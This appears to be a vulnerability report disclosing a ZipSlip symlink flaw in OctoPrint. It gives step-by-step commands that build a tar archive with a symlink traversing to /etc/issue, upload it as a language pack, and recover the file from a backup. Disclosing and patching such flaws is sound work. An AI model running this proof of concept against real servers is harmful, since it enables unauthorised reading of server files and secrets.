ZipSlip Symlink variant allows to read any file within OctoPrint Box

Using the ZipSlip symlink variant, it is possible to steal any file from the OctoPrint remote server via an upload of a maliciously crafted archive as a language pack and download the stolen files within a backup archive.

To set up the Octoprint web application, we used the dockerized version

sudo docker volume create octoprint
sudo docker run -d -v octoprint:/octoprint -p 80:80 --name octoprint octoprint/octoprint

Generate a maliciously crafted archive as follow:

# unzip the language pack for italian
unzip language-pack-it.zip 
cd ./it/LC_MESSAGES/

# generate a symlink as shown below, notice the difference between ../ and ./
ln -s ././../../../../../../../../../etc/issue issue.y3

# add it to a maliciously crafted TAR archive
tar -cvf it_crafted.tar ./it/

After initial configuration with default parameters, login and head to OctoPrint Settings > Octoprint Appearance > Language Packs. Click onManage > Upload additional Language Packs. Upload the it_crafted.tar archive as a language pack.

Now, head to Octoprint settings > Backup & Restore. Click onCreate backup now. Download the new backup archive. Read the content of the file located within the backup archive at /basedir/translations/it/LC_MESSAGES/issue.y3. You will get the server-side issue file.